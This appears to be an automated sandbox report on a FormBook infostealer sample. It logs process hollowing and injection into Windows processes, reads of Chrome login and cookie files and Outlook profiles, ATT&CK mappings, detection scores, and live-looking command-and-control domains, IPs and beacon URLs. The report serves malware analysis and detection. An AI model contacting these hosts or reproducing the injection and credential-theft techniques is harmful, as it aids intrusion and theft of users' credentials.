Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01602581 mov eax, dword ptr fs:[00000030h]	1_2_01602581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01602581 mov eax, dword ptr fs:[00000030h]	1_2_01602581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01602581 mov eax, dword ptr fs:[00000030h]	1_2_01602581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160FD9B mov eax, dword ptr fs:[00000030h]	1_2_0160FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160FD9B mov eax, dword ptr fs:[00000030h]	1_2_0160FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160A44B mov eax, dword ptr fs:[00000030h]	1_2_0160A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015F746D mov eax, dword ptr fs:[00000030h]	1_2_015F746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0166C450 mov eax, dword ptr fs:[00000030h]	1_2_0166C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0166C450 mov eax, dword ptr fs:[00000030h]	1_2_0166C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160BC2C mov eax, dword ptr fs:[00000030h]	1_2_0160BC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A740D mov eax, dword ptr fs:[00000030h]	1_2_016A740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A740D mov eax, dword ptr fs:[00000030h]	1_2_016A740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A740D mov eax, dword ptr fs:[00000030h]	1_2_016A740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01691C06 mov eax, dword ptr fs:[00000030h]	1_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01691C06 mov eax, dword ptr fs:[00000030h]	1_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01691C06 mov eax, dword ptr fs:[00000030h]	1_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01691C06 mov eax, dword ptr fs:[00000030h]	1_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01691C06 mov eax, dword ptr fs:[00000030h]	1_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01691C06 mov eax, dword ptr fs:[00000030h]	1_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01691C06 mov eax, dword ptr fs:[00000030h]	1_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01691C06 mov eax, dword ptr fs:[00000030h]	1_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01691C06 mov eax, dword ptr fs:[00000030h]	1_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01691C06 mov eax, dword ptr fs:[00000030h]	1_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01691C06 mov eax, dword ptr fs:[00000030h]	1_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01691C06 mov eax, dword ptr fs:[00000030h]	1_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01691C06 mov eax, dword ptr fs:[00000030h]	1_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01691C06 mov eax, dword ptr fs:[00000030h]	1_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01656C0A mov eax, dword ptr fs:[00000030h]	1_2_01656C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01656C0A mov eax, dword ptr fs:[00000030h]	1_2_01656C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01656C0A mov eax, dword ptr fs:[00000030h]	1_2_01656C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01656C0A mov eax, dword ptr fs:[00000030h]	1_2_01656C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016914FB mov eax, dword ptr fs:[00000030h]	1_2_016914FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01656CF0 mov eax, dword ptr fs:[00000030h]	1_2_01656CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01656CF0 mov eax, dword ptr fs:[00000030h]	1_2_01656CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01656CF0 mov eax, dword ptr fs:[00000030h]	1_2_01656CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A8CD6 mov eax, dword ptr fs:[00000030h]	1_2_016A8CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E849B mov eax, dword ptr fs:[00000030h]	1_2_015E849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A8F6A mov eax, dword ptr fs:[00000030h]	1_2_016A8F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015EEF40 mov eax, dword ptr fs:[00000030h]	1_2_015EEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015EFF60 mov eax, dword ptr fs:[00000030h]	1_2_015EFF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015FF716 mov eax, dword ptr fs:[00000030h]	1_2_015FF716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160E730 mov eax, dword ptr fs:[00000030h]	1_2_0160E730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A070D mov eax, dword ptr fs:[00000030h]	1_2_016A070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A070D mov eax, dword ptr fs:[00000030h]	1_2_016A070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160A70E mov eax, dword ptr fs:[00000030h]	1_2_0160A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160A70E mov eax, dword ptr fs:[00000030h]	1_2_0160A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D4F2E mov eax, dword ptr fs:[00000030h]	1_2_015D4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015D4F2E mov eax, dword ptr fs:[00000030h]	1_2_015D4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0166FF10 mov eax, dword ptr fs:[00000030h]	1_2_0166FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0166FF10 mov eax, dword ptr fs:[00000030h]	1_2_0166FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016137F5 mov eax, dword ptr fs:[00000030h]	1_2_016137F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E8794 mov eax, dword ptr fs:[00000030h]	1_2_015E8794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01657794 mov eax, dword ptr fs:[00000030h]	1_2_01657794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01657794 mov eax, dword ptr fs:[00000030h]	1_2_01657794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01657794 mov eax, dword ptr fs:[00000030h]	1_2_01657794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E7E41 mov eax, dword ptr fs:[00000030h]	1_2_015E7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E7E41 mov eax, dword ptr fs:[00000030h]	1_2_015E7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E7E41 mov eax, dword ptr fs:[00000030h]	1_2_015E7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E7E41 mov eax, dword ptr fs:[00000030h]	1_2_015E7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E7E41 mov eax, dword ptr fs:[00000030h]	1_2_015E7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E7E41 mov eax, dword ptr fs:[00000030h]	1_2_015E7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015FAE73 mov eax, dword ptr fs:[00000030h]	1_2_015FAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015FAE73 mov eax, dword ptr fs:[00000030h]	1_2_015FAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015FAE73 mov eax, dword ptr fs:[00000030h]	1_2_015FAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015FAE73 mov eax, dword ptr fs:[00000030h]	1_2_015FAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015FAE73 mov eax, dword ptr fs:[00000030h]	1_2_015FAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0169AE44 mov eax, dword ptr fs:[00000030h]	1_2_0169AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0169AE44 mov eax, dword ptr fs:[00000030h]	1_2_0169AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E766D mov eax, dword ptr fs:[00000030h]	1_2_015E766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0168FE3F mov eax, dword ptr fs:[00000030h]	1_2_0168FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015DC600 mov eax, dword ptr fs:[00000030h]	1_2_015DC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015DC600 mov eax, dword ptr fs:[00000030h]	1_2_015DC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015DC600 mov eax, dword ptr fs:[00000030h]	1_2_015DC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01608E00 mov eax, dword ptr fs:[00000030h]	1_2_01608E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01691608 mov eax, dword ptr fs:[00000030h]	1_2_01691608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160A61C mov eax, dword ptr fs:[00000030h]	1_2_0160A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0160A61C mov eax, dword ptr fs:[00000030h]	1_2_0160A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015DE620 mov eax, dword ptr fs:[00000030h]	1_2_015DE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016016E0 mov ecx, dword ptr fs:[00000030h]	1_2_016016E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_01618EC7 mov eax, dword ptr fs:[00000030h]	1_2_01618EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0168FEC0 mov eax, dword ptr fs:[00000030h]	1_2_0168FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016036CC mov eax, dword ptr fs:[00000030h]	1_2_016036CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A8ED6 mov eax, dword ptr fs:[00000030h]	1_2_016A8ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_015E76E2 mov eax, dword ptr fs:[00000030h]	1_2_015E76E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016546A7 mov eax, dword ptr fs:[00000030h]	1_2_016546A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A0EA5 mov eax, dword ptr fs:[00000030h]	1_2_016A0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A0EA5 mov eax, dword ptr fs:[00000030h]	1_2_016A0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_016A0EA5 mov eax, dword ptr fs:[00000030h]	1_2_016A0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0166FE87 mov eax, dword ptr fs:[00000030h]	1_2_0166FE87

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 1_2_0040CF93 LdrLoadDll,

1_2_0040CF93

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.tf8dangky.online
Source: C:\Windows\explorer.exe	Network Connect: 76.223.105.230 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 164.88.201.214 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.sandpiper-apts.com
Source: C:\Windows\explorer.exe	Domain query: www.frogair.online
Source: C:\Windows\explorer.exe	Domain query: www.hvlandscapes.biz
Source: C:\Windows\explorer.exe	Network Connect: 184.94.215.91 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.151.199.52 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 18.138.206.213 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 81.169.145.72 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.n-r-eng.com
Source: C:\Windows\explorer.exe	Domain query: www.teammart.online
Source: C:\Windows\explorer.exe	Domain query: www.laylaroseuk.com
Source: C:\Windows\explorer.exe	Network Connect: 103.221.223.104 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.mitsubangsaen.online
Source: C:\Windows\explorer.exe	Domain query: www.suachuadienlanh247.com
Source: C:\Windows\explorer.exe	Network Connect: 2.57.90.16 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 13B0000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: C17008	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread register set: target process: 3452			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Thread register set: target process: 3452			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe

Jump to behavior

Source: explorer.exe, 00000002.00000000.263766922.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.525683084.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerT7<=ge
Source: file.exe, 00000000.00000002.259559774.0000000002FEA000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.534510669.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.277766832.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: file.exe, 00000000.00000002.259559774.0000000002FEA000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.263766922.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.525683084.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000002.525053305.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.262847377.0000000001378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CProgmanile
Source: explorer.exe, 00000002.00000000.263766922.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.525683084.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.309105530.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.525917606.0000000000BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.525981874.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.524739251.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\wlanext.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\wlanext.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.309105530.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.525917606.0000000000BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.525981874.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.524739251.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Shared Modules	Path Interception	812 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	1 Input Capture	2 Process Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	4 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Archive Collected Data	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	812 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	1 Data from Local System	Scheduled Transfer	14 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Remote System Discovery	SSH	1 Clipboard Data	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	4 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	13 Software Packing	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	37%	Virustotal		Browse
file.exe	100%	Avira	HEUR/AGEN.1203412
file.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.0.file.exe.b20000.0.unpack	100%	Avira	HEUR/AGEN.1203412		Download File
1.2.CasPol.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.mitsubangsaen.online/crhz/	0%	Avira URL Cloud	safe
http://www.frogair.online/crhz/?Mkn=iycDOFv4tLFlCihz1M/bkpzttTI3wOwIoAcOv31GIYKsRKZ8f8EzkP6Z56SPUyztaOnMa+iauXtsUeY/SnJDQAP7ZwMaqvgwrA==&vux=DmStydFUWc8HD	0%	Avira URL Cloud	safe
http://www.hvlandscapes.biz/crhz/	0%	Avira URL Cloud	safe
http://www.laylaroseuk.com/crhz/?Mkn=1rNCCz7kTcLTieqVkhzplJgcoI94HvPGoNH0lVnmkmFXwmlt9jZmgzPB/kdX+WOK+rGt5Wg7VkzKMCVbaV5xHn8QLAS8Zm4ynQ==&vux=DmStydFUWc8HD	0%	Avira URL Cloud	safe
http://www.nftspaceview.com	0%	Avira URL Cloud	safe
http://www.laylaroseuk.com	0%	Avira URL Cloud	safe
http://www.mitsubangsaen.online	0%	Avira URL Cloud	safe
http://www.frogair.online	0%	Avira URL Cloud	safe
http://www.popcors.com/crhz/	0%	Avira URL Cloud	safe
http://www.teammart.online/crhz/?Mkn=4Z6KAxgBWslvyWQs2zz1LTCSIJZnXz/Wr59nnN1quAvIIyJUwPyWYoHYYm82bfT5dpIzg2ZgrTpqnEgpaKo2QZ2CGF/wkiG+Fw==&vux=DmStydFUWc8HD	0%	Avira URL Cloud	safe
https://www.tf8dangky.online/crhz/?Mkn=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T	0%	Avira URL Cloud	safe
http://www.hayuterce.com	0%	Avira URL Cloud	safe
http://www.popcors.comCR	0%	Avira URL Cloud	safe
http://www.teammart.online	0%	Avira URL Cloud	safe
http://www.suachuadienlanh247.com	0%	Avira URL Cloud	safe
http://www.n-r-eng.com/crhz/	100%	Avira URL Cloud	malware
http://www.n-r-eng.com	0%	Avira URL Cloud	safe
http://www.wenzid4.top	0%	Avira URL Cloud	safe
http://www.tf8dangky.online/crhz/?Mkn=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEmRdiQ98V40n9u5A==&vux=DmStydFUWc8HD	0%	Avira URL Cloud	safe
http://hvlandscapes.biz/crhz/?Mkn=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR	0%	Avira URL Cloud	safe
http://www.wenzid4.topd	0%	Avira URL Cloud	safe
http://www.wylvxing.com/crhz/	0%	Avira URL Cloud	safe
http://www.thepromotionhunter.com	0%	Avira URL Cloud	safe
http://www.popcors.com	0%	Avira URL Cloud	safe
http://www.hayuterce.com/crhz/	0%	Avira URL Cloud	safe
http://www.n-r-eng.com/crhz/?Mkn=O29nP3ATS/5Z6K6ZOqFFpve/mTBG7paw5+pol+lVZCotPeZJEV3KnsQwBw1FpEdPbpeQCJZSqBlkKVIQIQyxkbVFYCGm9IFlQQ==&vux=DmStydFUWc8HD	100%	Avira URL Cloud	malware
